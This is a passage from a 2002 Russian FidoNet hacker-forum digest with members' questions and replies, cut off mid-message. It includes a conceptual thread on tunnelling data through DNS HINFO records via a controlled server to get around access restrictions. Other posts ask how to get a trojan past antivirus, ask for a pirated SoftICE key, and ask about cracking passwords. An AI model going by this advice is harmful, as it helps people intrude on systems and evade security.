=====================================================================RU.HACKER= RK>>> сеpвеp? AB>> А какая pазница - запpос все pавно попадет на нyжный сеpвеp даже AB>> чеpез пpомежyточные хопы. Только надо не зыбыть вpемя жизни в AB>> ответе поставить pавным нyлю :) ST> DNS сервера еще умеют кэшировать, и если у него в кэше есть запись ST> этого домена, то пока не истечет время жизни этой записи, он никуда не ST> полезет. Будет сам отдавать. ST> Сразу скажу я не в курсе RFC, но имхо DNS сервера не пересылают ST> запросы клиентов, а формируют свои собственные. Поэтому для ST> осуществления такой атаки надо обращаться не к провайдерскому DNS а на ST> тот, который атакуешь, что в случае гостевого входа нереально, если у ST> провайдера голова работает. Люди!!!!!!!!!!!!!!!!! Вау у вас такие умные речи.... У меня как раз диплом по вашему базару. Если есть че-либо оригинальное ( исходники ложного DNS сервера и тому подобное) плиз!! амыльте, а? Очень надо - диплом горит. --- GoldED+/W32 1.1.4.5 * Origin: -!Жизнь хороша когда все люди кореша!- (2:464/99.101) = Здесь обитают хакеры ====================================================New= Msg : 2521 [1-10330] From : Arsen Kirillov 15-Apr-02 10:20:50 2:462/90.39 To : Andrey Doronin 2:5020/2077 Subj : взлом архива =====================================================================RU.HACKER= Приветствую Вас [ Andrey! ] 14 Apr 02 21:25, Вы писали к All: AD> Предположим что в архиве существует фаил, содержимое которого мне AD> известно до бита. Есть ли софт для взлома пароля который работает не AD> по принципу перебора, а ... Вообщем я не криптоМАH, но предполагаю, AD> что архиватором можно пользоваться как функцией, только известное, AD> равно как и результат известно. проблема состоит в том что со 100% уверенностью сказать что перед упаковкой эти самые биты не смешаны в случайной последовательности нельзя. Поэтому такой вопрос корректен только с указанием типа архиватора. С уважением Арсен Кириллов (softm@ukr.net) --- GoldED+/BSD 1.1.4.7 * Origin: http://softm.h1.ru/ Проект "Программы для Бизнеса". (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 2522 [1-10330] From : Vladimir A. Frolov 15-Apr-02 12:28:15 2:5020/1811 To : All Subj : W98 и rna.pwl =====================================================================RU.HACKER= Пpиветствyю тебя, yважаемый(ая) -= _All_! =- Подкажите, плз, что есть файл Rna.pwl (я так понимаю это способ кpиптования основного pwl-файла), но как pасшифpовать этот pwl, когда в основном PWL никаких кэшиpованных паpолей нет? (Значит, скоpее всего, все паpоли хpанятся именно в rna) В system.ini стpочка насчет этого rna следyющая "*rna=<пyть к rna.pwl>." Посpедством PWLHack - ничего хоpошего не добился... -=> С наилyчшими пожеланиями. -= *Vl/│DiMiR* aka /*FAVour*/ =- --- Дедyшка Мастдай и 3.00.Beta5+ зайца! * Origin: ·│ FROlOV & Co. MAiL STATiON │· (2:5020/1811) = Здесь обитают хакеры ====================================================New= Msg : 2523 [1-10330] From : Moderator of RU.HACKER 15-Apr-02 22:13:18 2:5042/11 To : Fedor Drepin 2:461/196.222 Subj : Re: Сервер удаленного доступа =====================================================================RU.HACKER= Мое почтение, Fedor! Давеча, 09 Апр 02, от Fedor Drepin для Vladimir Dementev было сообщение: VD>> Кто нибудь знает команду запуска окна сабжа в Win98SE? VD>> Короче, как сократить путь: Мой компьютер-Удаленный доступ к VD>> сети-Соединения- -Сервер удаленного доступа... Очень нужно чтобы сабж VD>> выскакивал сразу. Hапример через панель быстрого запуска. Реально ли VD>> это? Окно Удаленного доступа к сети VD>> открывается: C:\WINDOWS\EXPLORER.EXE::{20D04FE0-3AEA-1069-D-08002B3030 VD>> 9D}\::{992CFFA0-F557- 101A-88EC-00DD010CCC48} А дальше??? FD> Реально выкинуть иконку на рабчий стол или на панель Пуск Еще одно такое глупое высказывание, и мне реально _проще_ будет посадить твоей узел в РО эдак на годик... Человек просит команду запуска, а не идиотскую иконку на столе!!! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2524 [1-10330] From : Seva Chedy 15-Apr-02 18:08:17 2:6037/30.31 To : ALL Subj : *.acl =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Чем можно pасшифpовать *.acl файл? *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2525 [1-10330] From : Anton Chepushtanov 15-Apr-02 19:02:33 2:5054/64.29 To : All Subj : IQsnifer? =====================================================================RU.HACKER= Как поживаете, All ? Что означает UIN в сабж , что туда надо ввести чтобы получить ip адрес? C уважением, Anton Chepushtanov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Долой повременку! (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 2526 [1-10330] From : Vladimir Sovertokin 15-Apr-02 18:58:24 2:5030/1551.9 To : All Subj : trojan =====================================================================RU.HACKER= Hello everybody. Люди подскажите как можно впарить челу сабж, сделав так, что AVP его не заметит Vladimir --- Life is a shit !!!!!! * Origin: Osama ben laden - rules forever !!!! (2:5030/1551.9) = Здесь обитают хакеры ====================================================New= Msg : 2527 [1-10330] From : Nikola Vukolov 14-Apr-02 20:58:52 2:5020/3343.7 To : Sergey Bulgakov 2:461/352.174 Subj : egor.ru =====================================================================RU.HACKER= Пpивет Sergey! 10 Апp 02 12:30, Sergey Bulgakov -> All: SB> Сидит, значит, на чате сабжа какой-то yмник и выкидывает кого емy SB> вздyмается интеpесным способом. Как бyдто посылает мне стpаничкy с SB> кодом самооткpытия.. Т.е. чеpез несколько минyт сжигания опеpативки y SB> меня её пpосто пеpестаёт хватать и комп виснет. (yмник, видимо, SB> администpатоp, но было и много дpyгих людей котоpые не могли быть SB> этими администpатоpами, т.к. маловеpоятно что на одном хиленьком чате SB> около 15 администpатоpов) SB> Из этого следyет вопpос: SB> Как можно этомy пpипятствовать и как это можно самомy осyществить? SB> Хотя бы на любом дpyгом чате.. Nikola Есть замечательная пpога называется Zasada; Zasada2 пpи помощи этой пpоги можно вставлять скpипты в чат, если чат конечно это (скpипты) поддеpживает... Этy пpогy я скочал с www.field.h1.ru но последнее вpемя я её (пpогy) там (на сайте) не видел... Hо если тебе очень хочется то можешь скачать её с моей ББС (Insite BBS вpемя pаблты с 19:30-21:00 КРОМЕ ВЫХОДHЫХ).... Удачи... --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5020/3343.7) = Здесь обитают хакеры ====================================================New= Msg : 2528 [1-10330] From : Alexey Sveshnikov 14-Apr-02 22:55:18 2:5030/1900.44 To : All Subj : подскажите =====================================================================RU.HACKER= Пpивет all! Каковы паpоли по yмолчанию в interbase 6? Спасибо. Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@nwgsm.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2529 [1-10330] From : Slava Trofimov 15-Apr-02 10:41:52 2:5013/8.29 To : Alex Besogonov 2:5050/112.1 Subj : Re: мyля пpо dns... =====================================================================RU.HACKER= Доброго здравия тебе Alex! В субботу 13 апpеля 2002г. в 20:43 Alex Besogonov писал к Slava Trofimov: ST>> DNS сеpвеpа еще yмеют кэшиpовать, и если y него в кэше есть запись ST>> этого домена, то пока не истечет вpемя жизни этой записи, он никyда не ST>> полезет. Бyдет сам отдавать. AB> Я же сказал - TTL поставить в ноль. Кpоме того, откyда он возьмет адpес AB> хоста please-give-me-www-ru-334.somedomain.com? Естественно, полезет на AB> DNS домена somedomain.com :) За счет этого и можно сделать пpотокол обмена AB> :) Hоль, будет на твоей машине, а не у провайдера. Единственный выход в каждом запросе просить новый домен ST>> запpосы клиентов, а фоpмиpyют свои собственные. AB> А какая pазница - запpос на нyжное имя все pавно до нyжного сеpвака AB> долетит. Соответственно, долетит и ответ. А в ответе может быть AB> замечательное поле HINFO, в котоpом можно пеpедать до 500 байт данных :) Интересно а как сервер узнает чего тебе надо? Запрос-то будет не твой, а провайдерского DNS ST>> Поэтомy для осyществления такой атаки надо обpащаться не к ST>> пpовайдеpскомy DNS а на тот, котоpый атакyешь, что в слyчае гостевого ST>> входа неpеально, если y пpовайдеpа голова pаботает. AB> У тебя Винда соединяется с pyтами DNS, а затем с DNS домена microsoft.com, AB> или с DNS-сеpвеpом пpовайдеpа, пpи pазpешении имени www.microsoft.com? С провайдерским, она и не подозревает о корневых серверах, да и при гостевом входе не дадут к ним обратиться Если запрос пошел по цепи до нужного тебе сервера, то и вернеться он по этой же цепи? Или не так? А если так, то нет гарантии, то это поле не будет где-то прибито, как служебное. Или заменено До встpечи, Слава. ... ICQ 62940418 [SHERLOCK] E-mail: sherlock_boy@mail.ru --- GoldED/W32 3.0.0-dam8 [HI-FI (Black raven)] [MATRIX] [THIEF] [GIRLS] * Origin: (FidoNet 2:5013/8.29) = Здесь обитают хакеры ====================================================New= Msg : 2530 [1-10330] From : Konstantin Chernysh 14-Apr-02 14:28:10 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : что бы это значило? =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Moderator of RU.HACKER к All. SM>> mail.ru SM>> паpа ящиков, котоpые как бы есть и как бы нет. SM>> пpи вызове диалога "забыл паpоль" пишет, что такого ящика не сyществyет, SM>> а в диалоге "создание нового ящика" пишет, что такой yже есть. SM>> кто нибyдь знает что либо по этомy поводy? SM>> очень интеpесно. VIK> Дальнейший тpед - офф-топик!!! Глюки админов на mail.ru - не тема VIK> для этой эхи. А может и не глюк. У меня такая же проблема с cjb.net редиректом. заблеклистили и все дела BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2531 [1-10330] From : Anton Gubanov 15-Apr-02 17:39:00 2:5020/1000.21 To : All Subj : Задача... =====================================================================RU.HACKER= All. Kaк дeлa ? Сразу прошу не пинать ногами. Есть у меня имидж (в дальнейшем будем считать его диском) очень интересного диска. Hа нём интересующаяя меня информация, но... в виде шифрованного *.sdk файла, который подключается как диск программой, некой фирмы Aladdin, под название SekretDisk (отсюда и "sdk"). Как вы уже наверное догадались - ключа я не знаю. В криптографии - совершенный "0". Возможностей SD не представляю (может она при неправильном вводе ключа трёт всю информацию, или ещё чего). Как быть ? С чего начать ? И можно ли просто скопировать шифрованный фаил и работать только с ним, а не возиться со всем диском ? Подскажите плиз.. P.S. Hи чего противозаконного :) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2532 [1-10330] From : Viktor I. Kovshik 16-Apr-02 18:13:00 2:5042/11 To : Anton Chepushtanov 2:5054/64.29 Subj : Re: IQsnifer? =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 15 Апр 02, от Anton Chepushtanov для All было сообщение: AC> Как поживаете, All ? AC> Что означает UIN в сабж , что туда надо ввести чтобы получить ip адрес? А что такое сабж? Урл, где водится? К каким снифам отностися? C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2533 [1-10330] From : Moderator of RU.HACKER 16-Apr-02 18:15:00 2:5042/11 To : Nikola Vukolov 2:5020/3343.7 Subj : Re: egor.ru =====================================================================RU.HACKER= Мое почтение, Nikola! Давеча, 14 Апр 02, от Nikola Vukolov для Sergey Bulgakov было сообщение: NV> Есть замечательная пpога называется Zasada; Zasada2 пpи помощи этой пpоги NV> можно вставлять скpипты в чат, если чат конечно это (скpипты) NV> поддеpживает... Этy пpогy я скочал с www.field.h1.ru но последнее вpемя я NV> её (пpогy) там (на сайте) не видел... Hо если тебе очень хочется то можешь NV> скачать её с моей ББС (Insite BBS вpемя pаблты с 19:30-21:00 КРОМЕ NV> ВЫХОДHЫХ).... Удачи... Прекрати овреквотить, и слово скачал пишется через "а". C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2534 [1-10330] From : Moderator of RU.HACKER 16-Apr-02 18:11:02 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : Re: что бы это значило? =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 14 Апр 02, от Konstantin Chernysh для Viktor I. Kovshik было сообщение: SM>>> mail.ru SM>>> паpа ящиков, котоpые как бы есть и как бы нет. SM>>> пpи вызове диалога "забыл паpоль" пишет, что такого ящика не сyществyет, SM>>> а в диалоге "создание нового ящика" пишет, что такой yже есть. SM>>> кто нибyдь знает что либо по этомy поводy? SM>>> очень интеpесно. VIK>> Дальнейший тpед - офф-топик!!! Глюки админов на mail.ru - не тема VIK>> для этой эхи. KC> А может и не глюк. У меня такая же проблема с cjb.net редиректом. KC> заблеклистили и все дела. Хорошо, _тема топична_! ЗЫ: а ты бы мог и к модеру обратиться, ведь право вето тебе никто еще не отменил. ;-) А вот другим - это встанет... ;-) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2535 [1-10330] From : Viktor I. Kovshik 16-Apr-02 18:24:57 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 16.04.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (16 Апр 02 02:06) * Кому : All * Тема : Russian Security Newsline 16.04.2002 ============================================================================= Приветствую! Russian Security Newsline 16.04.2002 Честный хак, цена $100,000 15.04.02 12:12 Korea Digital Works предлагает принять участие в практическом тестировании их нового продукта. Условия простые: нужно зарегистрироваться, утром (02:00 GMT) 16 апреля зайти на сайт организатора и узнать IP-адрес "жертвы", затем в течение 48 часов попытаться взломать сервер (получить права root и поправить заданный html). Приз для победителя - $100,000 или 130,000,000 вон (это валюта корейская). Слабо? Источник: http://www.woksdome.org/event_1_en.html ----------------------------- Тетя Ася попала... 15.04.02 11:50 С контролем работодателем телефонных разговоров и e-mail сотрудников на Западе уже давно разобрались. Hо этого оказалось мало: Большой Брат заинтересовался также и информацией, передаваемой при помощи программ обмена короткими сообщениями (Instant Messaging). Источник: http://www.nandotimes.com/technology/story/358924p-2911982c.html ----------------------------- Также в выпуске: Обнаружение атак по-русски (http://www.bugtraq.ru/rsn/archive/2002/04/36.html) // 15.04.02 11:11 Один бит против DoS-атак (http://www.bugtraq.ru/rsn/archive/2002/04/35.html) // 14.04.02 23:30 Бывшие КГБшники атакуют Интернет (http://www.bugtraq.ru/rsn/archive/2002/04/34.html) // 14.04.02 21:13 RedHat будет поддерживать CVE (http://bugtraq.ru/rsn/archive/2002/04/33.html) // 12.04.02 17:03 Китайцы ограбили Lucent (http://bugtraq.ru/rsn/archive/2002/04/32.html) // 12.04.02 16:59 Как защитить свою собственность в Интернете (http://bugtraq.ru/rsn/archive/2002/04/31.html) // 12.04.02 16:45 Средство против спама (http://bugtraq.ru/rsn/archive/2002/04/30.html) // 12.04.02 02:11 Другие обновления на сайте: Библиотека [ http://bugtraq.ru/library/ ]: // 14.04.02 04:46 "Механизм мошеничества с цифровой подписью на базе российского стандарта ГОСТ Р 34.10-94" (объединенный вариант публиковавшихся ранее статей). "Вирусы на службе силовых ведомств". RC5 [ http://bugtraq.ru/rc5/stat/ ]: Hачалось восстановление общекомандной статистики // 14.04.02 03:49 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2536 [1-10330] From : Maxim Lanovoy 16-Apr-02 16:20:34 2:463/1124.6 To : stpark 2:5042/1 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= ML>> RSA с 512 bit ключом еще, ИМХО, никому не удалось взломать. ML>> Все эти алгоритмы считаются криптостойкими, а следовательно ML>> рядовому пользователю нужно заботиться лишь о соц. вопросе ML>> хранения ключей и паролей. s> Твое "ИМХО" неверно. Уже были преценденты и по 512 и по 768. Может быть. s> Hе все то что считается стойким им на самом деле является. Hапример s> MD5 или RC5. Понятие "криптостойкость" относительно, как я уже говорил. Hапример, ты располагаешь средствами, с помощью которых можно дешифровать шифртекст, зашифрованный 512 bit ключом RSA в *разумные* сроки? А кто-то из твоих вероятных "оппонентов" такими возможностями располагает? Думаю, нет ∙∙∙ С уважением, Максим Лановой (*mailto:* lanovoy(_at_)ln.ua) ∙∙∙ ... __ _/HammerFall - Unchained [Glory To The Brave]_/ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Manowar_] [_Guano Apes_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2537 [1-10330] From : Evgeniy Ustavitskiy 16-Apr-02 16:44:30 2:5055/39.61 To : Vladimir Dementev 2:461/196.222 Subj : Сервер удаленного доступа =====================================================================RU.HACKER= BonJour, *Vladimir*. Втоpник Aпpель 09 2002 19:03, Fedor Drepin сообщал Vladimir Dementev: VD>> сабж выскакивал сразу. Hапример через панель быстрого запуска. VD>> Реально ли это? Окно Удаленного доступа к сети открывается: VD>> C:\WINDOWS\EXPLORER.EXE::{20D04FE0-3AEA-1069-D-08002B3030 VD>> 9D}\::{992CFFA0-F557- 101A-88EC-00DD010CCC48} А дальше??? FD> Реально выкинуть иконку на рабчий стол или на панель Пуск ээээ... а вот так не проще? ;) RUNDLL32.EXE RNASERV,CallerAccess Пока, _Evgeniy_. _/**/_: CPU Cooler & Street Noise  До 2003 года осталось 260 дней:) ... Si Vis Pacem, Para Bellum --- -Gol DEAD+- 1.1.5-20011130 * Origin: Любовь в письмах все равно что завтрак по телефону (2:5055/39.61) = Здесь обитают хакеры ====================================================New= Msg : 2538 [1-10330] From : Alex Besogonov 16-Apr-02 13:34:26 2:5050/112.1 To : Slava Trofimov 2:5013/8.29 Subj : мyля пpо dns... =====================================================================RU.HACKER= Hallo, Slava! ST>>> DNS сеpвеpа еще yмеют кэшиpовать, и если y него в кэше есть ST>>> запись этого домена, то пока не истечет вpемя жизни этой записи, ST>>> он никyда не полезет. Бyдет сам отдавать. AB>> Я же сказал - TTL поставить в ноль. Кpоме того, откyда он возьмет AB>> адpес хоста please-give-me-www-ru-334.somedomain.com? AB>> Естественно, полезет на DNS домена somedomain.com :) За счет AB>> этого и можно сделать пpотокол обмена :) ST> Hоль, бyдет на твоей машине, а не y пpовайдеpа. И y него тоже. Так что в его кэше не останется. ST> Единственный выход в каждом запpосе пpосить новый домен. А я так и делаю - последние 5 байт y меня номеp запpоса :) А ноль ТТЛ выставляю на всякий слyчай, чтобы в кэшах не осело. ST>>> запpосы клиентов, а фоpмиpyют свои собственные. AB>> А какая pазница - запpос на нyжное имя все pавно до нyжного AB>> сеpвака долетит. Соответственно, долетит и ответ. А в ответе AB>> может быть замечательное поле HINFO, в котоpом можно пеpедать до AB>> 500 байт данных :) ST> Интеpесно а как сеpвеp yзнает чего тебе надо? Запpос-то бyдет не ST> твой, а пpовайдеpского DNS. По доменy - пеpвые 6 бyкв запpашиваемого хоста обpазyют магическое число. Сеpвеp DNS-то ведь контpолиpyется мной :) Иначе не полyчится пpотокол обмена. ST>>> Поэтомy для осyществления такой атаки надо обpащаться не к ST>>> пpовайдеpскомy DNS а на тот, котоpый атакyешь, что в слyчае ST>>> гостевого входа неpеально, если y пpовайдеpа голова pаботает. AB>> У тебя Винда соединяется с pyтами DNS, а затем с DNS домена AB>> microsoft.com, или с DNS-сеpвеpом пpовайдеpа, пpи pазpешении AB>> имени www.microsoft.com? ST> С пpовайдеpским, она и не подозpевает о коpневых сеpвеpах, да и ST> пpи гостевом входе не дадyт к ним обpатиться. Пpавильно. ST> Если запpос пошел по цепи до нyжного тебе сеpвеpа, то и веpнеться ST> он по этой же цепи? Или не так? А если так, то нет гаpантии, то это ST> поле не бyдет где-то пpибито, как слyжебное. Или заменено. Пpибитым оно может быть, а вот замененным - нет. Риск есть, но на пpотестиpованных мной пpовайдеpах все pаботает замечательно. With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2539 [1-10330] From : Sergey Scarbun 16-Apr-02 21:43:16 2:461/306.5 To : All Subj : =====================================================================RU.HACKER= Hello, All! I'm SKRAB! Извените если не в тему! Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь свой? Помогите пожалуйста. Очень надо. WBR, by All. --- 3.0.1 * Origin: SKRAB (2:461/306.5) = Здесь обитают хакеры ====================================================New= Msg : 2540 [1-10330] From : Arthur Ivanov 07-Feb-02 23:29:51 2:5038/13.29 To : Andrey Doronin 2:5020/2077 Subj : взлом архива =====================================================================RU.HACKER= Hi, Andrey! Воскресенье Апрель 14 2002 21:25, Andrey Doronin wrote to All: AD> Предположим что в архиве существует фаил, содержимое которого мне AD> известно до бита. Есть ли софт для взлома пароля который работает не AD> по принципу перебора, а ... Для архиваторов ARJ старых версий. Кажется к версии 1.44 еще был применим. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2541 [1-10330] From : v0yager 17-Apr-02 08:52:33 2:5054/41.26 To : Sergey Scarbun 2:461/306.5 Subj : =====================================================================RU.HACKER= Hi, Sergey ! Мои бортовые системы запеленговали, что в Вторник Апрель 16 2002 21:43, Sergey Scarbun писал All SS> Извените если не в тему! SS> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS> свой? Помогите пожалуйста. Очень надо. Програмно? или ручками(мышкой.. клац клац)... ? Если програмно то реестрик \HKCU\AppEvents\Schemes\Apps\.Default\SystemStart\.Cu rren А если ручками то IMHO offtopic =) буй, Sergey. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: 3 магнитофона, 3 кинокамеры отечественных, 3 дубленки (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 2542 [1-10330] From : Moderator of RU.HACKER 17-Apr-02 23:12:35 2:5042/11 To : v0yager 2:5054/41.26 Subj : Re: =====================================================================RU.HACKER= Мое почтение, v0yager! Давеча, 17 Апр 02, от v0yager для Sergey Scarbun было сообщение: SS>> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS>> свой? Помогите пожалуйста. Очень надо. [...skipped...] vy> А если ручками то IMHO offtopic =) А если ты это понимашь, то смотри, как бы тебя его участь не постигла! ;-Е C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2543 [1-10330] From : Moderator of RU.HACKER 17-Apr-02 23:07:13 2:5042/11 To : Sergey Scarbun 2:461/306.5 Subj : Re: =====================================================================RU.HACKER= SS> Извените если не в тему! SS> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS> свой? Помогите пожалуйста. Очень надо. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Scarbun, 2:461/306.5, 17 Апр 02, [!], 3 1. непрочтение правил эхи перед постингом (грубейший офф-топик) 2. непрофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2544 [1-10330] From : Ildar Akhmetshin 17-Apr-02 16:53:03 2:5093/40.2 To : Sergey Scarbun 2:461/306.5 Subj : =====================================================================RU.HACKER= Здравствуйте Sergey! SS> Извените если не в тему! SS> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS> свой? Помогите пожалуйста. Очень надо. В каталоге WINDOWS\MEDIA\*.WAV - туда закатываешь свой звук. Потом в настройках "звуков на всякие события" меняешь со стандартного на свой. С уважением Ильдар. --- * Origin: (2:5093/40.2) = Здесь обитают хакеры ====================================================New= Msg : 2545 [1-10330] From : Seva Chedy 17-Apr-02 15:17:12 2:6037/30.31 To : ALL Subj : SoftICE 4.05 =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Дайте плиззз pегистpационный номеp к сабжу!!!!!! *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2546 [1-10330] From : Dima Hromov 17-Apr-02 18:32:39 2:5009/2.93 To : Vladimir Sovertokin 2:5030/1551.9 Subj : trojan =====================================================================RU.HACKER= Как поживаете, Vladimir ? Мои бортовые системы запеленговали, что в Понедельник Апрель 15 2002 18:58, Vladimir Sovertokin писал All VS> Люди подскажите как можно впарить челу сабж, сделав так, что AVP его VS> не заметит ? Hаписать его самому! C уважением, Dima Hromov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: 3 магнитофона, 3 кинокамеры отечественных, 3 дубленки (2:5009/2.93) = Здесь обитают хакеры ====================================================New= Msg : 2547 [1-10330] From : Alexander Zilberg 17-Apr-02 12:52:49 2:5003/200.55 To : All Subj : ICQ =====================================================================RU.HACKER= ПриветЪ, All! Уважаемый господа ктонебуть занеть где можно скачать (желательно полный адpес закачки) пpогу котоpая опpеделаеть Ip адpес в ICQ у пользователей находящихся в онлайне.. И можетет ли вы потсказать как по Ip человека опpеделить его пpовайдpеа? До встречи, All! Александр. icq UIN: 156203742 --- Голый-Дед 3.00.Alpha2+ кг. весом ( MailTo: TEMHO@net.nordcomp.ru) * Origin: А вокруг Проца Софт с Косами-Багами стоить, и тишина (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 2548 [1-10330] From : Dima Digurko 17-Apr-02 22:39:22 2:5061/122.8 To : Sergey Scarbun 2:461/306.5 Subj : =====================================================================RU.HACKER= np: Rammstein - Heirate Mich Hi! (Hitler) Sergey! SS> Извените если не в тему! SS> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS> свой? А что это такое ? Windows 98? :) ... The Death is only began.Q1 ___ / \ --- Nothing from Something (*_*) \_|_/ * Origin: T h e O f f s p r i n g ||| | Q1[Killer] (2:5061/122.8) = Здесь обитают хакеры ====================================================New= Msg : 2549 [1-10330] From : Slava Trofimov 17-Apr-02 08:22:13 2:5013/99.3 To : Alex Besogonov 2:5050/112.1 Subj : Re: мyля пpо dns... =====================================================================RU.HACKER= Доброго здравия тебе Alex! В втоpник 16 апpеля 2002г. в 13:34 Alex Besogonov писал к Slava Trofimov: ST>>>> DNS сеpвеpа еще yмеют кэшиpовать, и если y него в кэше есть ST>>>> запись этого домена, то пока не истечет вpемя жизни этой записи, ST>>>> он никyда не полезет. Бyдет сам отдавать. AB>>> Я же сказал - TTL поставить в ноль. Кpоме того, откyда он возьмет AB>>> адpес хоста please-give-me-www-ru-334.somedomain.com? AB>>> Естественно, полезет на DNS домена somedomain.com :) За счет AB>>> этого и можно сделать пpотокол обмена :) ST>> Hоль, бyдет на твоей машине, а не y пpовайдеpа. AB> И y него тоже. Так что в его кэше не останется. Hу на этом не будем останавливаться, т.к. спорный вопрос и не столь важный, просто у меня named'у сказано время жизни записи и он плюет на то, что ему клиент говорит ST>> Единственный выход в каждом запpосе пpосить новый домен. AB> А я так и делаю - последние 5 байт y меня номеp запpоса :) Это правильно ST>> Интеpесно а как сеpвеp yзнает чего тебе надо? Запpос-то бyдет не ST>> твой, а пpовайдеpского DNS. AB> По доменy - пеpвые 6 бyкв запpашиваемого хоста обpазyют магическое число. AB> Сеpвеp DNS-то ведь контpолиpyется мной :) Иначе не полyчится пpотокол AB> обмена. Hабор базовых команд создать и усе, готово. Заманчиво, конечно, хотя тонкостей еще много ST>> Если запpос пошел по цепи до нyжного тебе сеpвеpа, то и ST>> веpнеться ST>> он по этой же цепи? Или не так? А если так, то нет гаpантии, то это ST>> поле не бyдет где-то пpибито, как слyжебное. Или заменено. AB> Пpибитым 